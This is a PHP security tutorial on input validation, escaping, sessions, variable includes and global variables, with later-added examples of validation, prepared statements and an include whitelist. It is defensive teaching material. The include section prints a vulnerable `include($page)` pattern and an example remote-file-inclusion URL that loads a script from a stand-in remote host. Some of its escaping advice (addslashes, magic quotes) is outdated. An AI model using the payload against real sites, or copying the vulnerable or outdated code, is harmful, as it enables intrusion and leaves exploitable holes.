PHP: Security in the use of the language

PHP is a great language. It is ready made to interact with MySQL and other similar databases. However, because of its ease of use, it can open security holes for both new and experienced programmers.

Always Validate User Input!

All sorts of havoc are possible if a user passes unexpected content to a PHP script. To avoid that possibility, you must validate user input. This is perhaps the number one rule of any server side programmer.

Validate Client Side:
You can, and should, validate with JavaScript in any form which seeks user input. The advantage of JavaScript validation is that it will reject improper content without touching your server. However, it provides no protection against intentional misuse.

Validate Server Side:
Even if you have strong client side validation, you must also validate on the server before performing any action with user provided input. If you have read any of the HTMLfixIT Perl tutorials, you know how strongly we feel about using taint mode for this very reason. If you ask for one type of information, but receive another, a malicious user could hack your database, or gain access to critical system files.
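A server side check for "ask for one type, receive another", as an added example that is not part of the original tutorial. The function name, form fields and limits are hypothetical; it uses only preg_match, filter_var and in_array from standard PHP.

```php
<?php
// Added example: the form fields and limits below are hypothetical.
function validate_signup(array $in)
{
    $clean  = array();
    $errors = array();

    // Username: a string of 3 to 20 letters, digits or underscores.
    // The is_string() test comes first so an array value never reaches preg_match().
    $user = isset($in['username']) ? $in['username'] : null;
    if (is_string($user) && preg_match('/^[A-Za-z0-9_]{3,20}$/D', $user)) {
        $clean['username'] = $user;
    } else {
        $errors[] = 'username';
    }

    // Age: must parse as a whole number in range; "34 years" and arrays fail.
    $age = filter_var(
        isset($in['age']) ? $in['age'] : null,
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 13, 'max_range' => 120))
    );
    if ($age !== false) {
        $clean['age'] = $age;
    } else {
        $errors[] = 'age';
    }

    // Plan: one of a fixed set of values, compared strictly (no type juggling).
    $plan = isset($in['plan']) ? $in['plan'] : null;
    if (in_array($plan, array('free', 'basic', 'pro'), true)) {
        $clean['plan'] = $plan;
    } else {
        $errors[] = 'plan';
    }

    // Callers use $clean only when $errors is empty.
    return array($clean, $errors);
}

// Constructed inputs: one well formed, one with the wrong type in every field.
list($ok, $okErrors) = validate_signup(
    array('username' => 'sam_01', 'age' => '34', 'plan' => 'pro'));
list($bad, $badErrors) = validate_signup(
    array('username' => '../etc', 'age' => '34 years', 'plan' => array('pro')));
var_dump($ok, $okErrors, $bad, $badErrors);
```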

Use Magic Quotes?

Magic Quotes, a somewhat unique feature of PHP, is automatically on in most configurations. You can find out if it is on in your server's PHP installation very simply (along with a whole lot of other helpful information) by running phpinfo. If you need a copy of that script, you can get it here. Look for the line: '--enable-magic-quotes' under the Configure Command section. If you are only going to run scripts on your own server and you are sure that it is on, then you have one big hurdle taken care of. However, if you may run the script elsewhere, or someone else controls your server configuration, you may want to add code to escape any special characters passed to you by a user. There is a very helpful article here which explains the problem, but stops short of offering the solution. We suggest the following code as the solution:

//seek to avoid non-magic_quotes risk
if (!ini_get('magic_quotes_gpc')) {
    $variable = addslashes($variable);
}

Obviously, each variable would be inserted where the word variable is in the example. If you use a large number of variables, then you would want to consider a loop that repeats the task for every passed variable, which might look something like this:

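/* works in PHP 4.1.0 and up as $_REQUEST is an
associative array consisting of the contents of
$_GET, $_POST, and $_COOKIE */
if (!ini_get('magic_quotes_gpc'))
    {
    foreach ($_REQUEST as $key=>$value)
       {
       // write the result back into the array; assigning to
       // $value alone would change only the loop's copy
       if (is_string($value))
          {
          $_REQUEST[$key] = addslashes($value);
          }
       }
    }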
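For values that end up in a database query, the example below (added here, not part of the original tutorial) binds user input through a PDO prepared statement, so nothing depends on the magic_quotes_gpc setting, which was removed from PHP in version 5.4.0. The table, column and sample values are constructed, and it assumes the pdo_sqlite extension is available.

```php
<?php
// Added example: table, column and sample values are constructed.
// Assumes the pdo_sqlite extension is available.

function add_user(PDO $db, $name)
{
    // The ? placeholder carries $name as data. It is never parsed as SQL,
    // so no addslashes() or magic quotes step is involved.
    $stmt = $db->prepare('INSERT INTO users (name) VALUES (?)');
    $stmt->execute(array($name));
}

function find_user(PDO $db, $name)
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->execute(array($name));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
// Fail loudly on SQL errors instead of returning false silently.
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');

// Names containing quotes and backslashes, the characters that
// addslashes() would have escaped by hand.
$names = array("alice", "O'Brien", 'a\'b"c\\d');
foreach ($names as $name) {
    add_user($db, $name);
}

// Each value comes back byte for byte as it was stored, with no stray
// backslashes and no effect on the structure of the query.
foreach ($names as $name) {
    $rows = find_user($db, $name);
    var_dump(count($rows) === 1 && $rows[0]['name'] === $name);
}
```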

Bake Without Cookies!

Cookies are sometimes used to pass important information such as usernames, passwords, and login status. You are much better off learning about sessions. Sessions store the information server side and are much more difficult to hack, spoof or crack.

Avoid the Use of Variables in Includes and File Calls!

Some coders feel they are writing good open ended modular scripts when they say something like:

<?php include( $page ); ?>

But consider the effect if someone passed this variable to the script:

http://www.yourdomain.com/script.php?page=http://remoteserver.com/nastyscript.php

It would load the remote server's page, because PHP isn't particular about what comes into it. So avoid using variables to include or require other pages.
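When a script does need to choose a page from a request parameter, one way to do it without passing the variable to include is a fixed lookup table. This is an added example, not code from the original tutorial; the page keys, the pages/ directory and the resolve_page() helper are hypothetical.

```php
<?php
// Added example: page keys, file names and the pages/ directory are hypothetical.

// The only files this script is willing to include, keyed by request value.
$pages = array(
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
);

function resolve_page(array $pages, $requested, $default = 'home')
{
    // Only an exact key from the table is accepted. A URL, a path
    // containing "../", or an array value falls back to the default.
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        $requested = $default;
    }
    // The path is built from the table entry, never from the request itself.
    return __DIR__ . '/pages/' . $pages[$requested];
}

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = resolve_page($pages, $requested);

if (is_file($file)) {
    include $file;
} else {
    header('HTTP/1.0 404 Not Found');
}
```

Whether include accepts a URL at all is governed by the allow_url_include setting in php.ini, which is off by default since PHP 5.2.0. The lookup table also keeps local paths supplied by the user out of the include.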

Global Variables - an on-again, off-again proposition:

Global variables were thought to be a great feature of PHP. Imagine the effort that can be saved by simply creating variables automatically from post and get. Unfortunately, if carelessly used, they can cause problems. It is usually best to turn them off unless you know exactly what you are doing.
If you do feel the need to leave them on, it's a good idea to pre-declare variables with fixed values prior to using them, i.e.

$somevar = 1; # this variable can now be safely used as you have removed
              # the chance of it retaining a value because a
              # ?somevar=some_nasty_value string was added to the script address.

so that if a somevar param is passed to the script, it will be overwritten by the value you have specified manually, thereby making safe what could otherwise be a risky bit of code.

Be Careful Out There ...

If any of you remember the TV series Hill Street Blues, the Captain always released his police officers with the phrase, "be careful out there," because the world can be a dangerous place. However, just because it can be less than perfect, don't be afraid to venture forth. Just spend a few minutes being sure your code is as tight as it can be from a security perspective. You can always do more, but be sure to at least cover the basics, to avoid difficulties down the road.

Lots More Help Out there:

PHP Security and Efficiency
Portable PHP Code (devArticles.com)
